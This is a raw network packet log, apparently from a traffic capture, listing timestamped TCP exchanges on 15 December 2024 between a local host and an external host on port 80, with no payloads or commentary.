                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.742578030 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.743098021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.743160963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.743227005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.743802071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.743885040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.743947983 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.744560003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.744693041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.744759083 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.745347977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.745445967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.745516062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.745982885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.746069908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.746134996 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.746563911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.746659994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.746725082 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.747397900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.747486115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.747551918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.747957945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.748013973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.748078108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.748615026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.748716116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.748779058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.749568939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.749692917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.749759912 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.750288963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.750406981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.750472069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.751120090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.751229048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.751296997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.751933098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.752046108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.752110958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.752883911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.752933025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.752998114 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.753643036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.764081955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.764144897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.764157057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.764408112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.764456987 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.764486074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.765172005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.765230894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.765283108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.766038895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.766091108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.766212940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.767061949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.767116070 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.767182112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.767740965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.767802000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.767937899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.768554926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.768604040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.768606901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.769345999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.769398928 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.769462109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.770250082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.770312071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.770385027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.771056890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.771106005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.771126986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.821422100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.911032915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.911237001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.911309004 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.911341906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.911509037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.911582947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.912317991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.912414074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.912481070 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.913324118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.913489103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.913552999 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.914288044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.914370060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.914433956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.914988995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.915112019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.915188074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.915637016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.915700912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.915761948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.916341066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.916451931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.916522026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.917207956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.917285919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.917350054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.918021917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.918129921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.918199062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.918855906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.919004917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.919071913 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.919722080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.919857025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.919924974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.920543909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.920644999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.920705080 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.921349049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.921473980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.921535969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.922158003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.922278881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.922337055 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.923002005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.923114061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.923183918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.923841000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.923933029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.923996925 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.924789906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.924877882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.924945116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.925535917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.925643921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.925713062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.926326036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.926446915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.926512957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.927232981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.927345991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.927419901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.928004980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.928152084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.928220987 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.928841114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.929002047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.929065943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.929678917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.929785013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.929857016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.930543900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.930655003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.930735111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.931344032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.931451082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.931516886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.932178020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.932288885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.932353973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.933017015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.933136940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.933206081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.933845043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.933963060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.934037924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.934679985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.934783936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.934849024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.935517073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.935627937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.935699940 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.936515093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.936542034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.936609030 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.937199116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.937287092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.937351942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.938016891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.938191891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.938263893 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.938855886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.938956022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.939018011 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.939683914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.939784050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.939847946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.940538883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.940686941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.940747976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.941349030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.941448927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.941509962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.942193031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.942279100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.942341089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.943030119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.943140030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.943296909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.943921089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.943979979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.944046021 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.944736004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.944854975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.944921017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.945842981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.945986986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.946053028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.946486950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.956279039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.956324100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.956403017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.956680059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.956727982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.956881046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.957506895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.957551003 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.957617998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.958337069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.958384037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.958441019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.959233999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.959284067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.959400892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.960170984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.960217953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.960298061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.960941076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.960985899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.961009979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.961700916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.961745024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.961786032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.962547064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.962591887 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.962624073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.963366032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.963411093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.963498116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.008917093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.103488922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.103528023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.103605032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.103786945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.103908062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.104012012 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.104533911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.104641914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.104712963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.105305910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.105447054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.106159925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.106236935 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.106324911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.106791019 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.106982946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.107090950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.107162952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.107929945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.108047009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.108150959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.108630896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.108757019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.108829021 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.109565020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.109721899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.110407114 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.110431910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.110503912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.110584021 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.111217022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.111272097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.111345053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.112360954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.112417936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.112508059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.113013029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.113126993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.113878012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.113974094 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:45.113982916 CET8049709185.81.68.147192.168.2.8
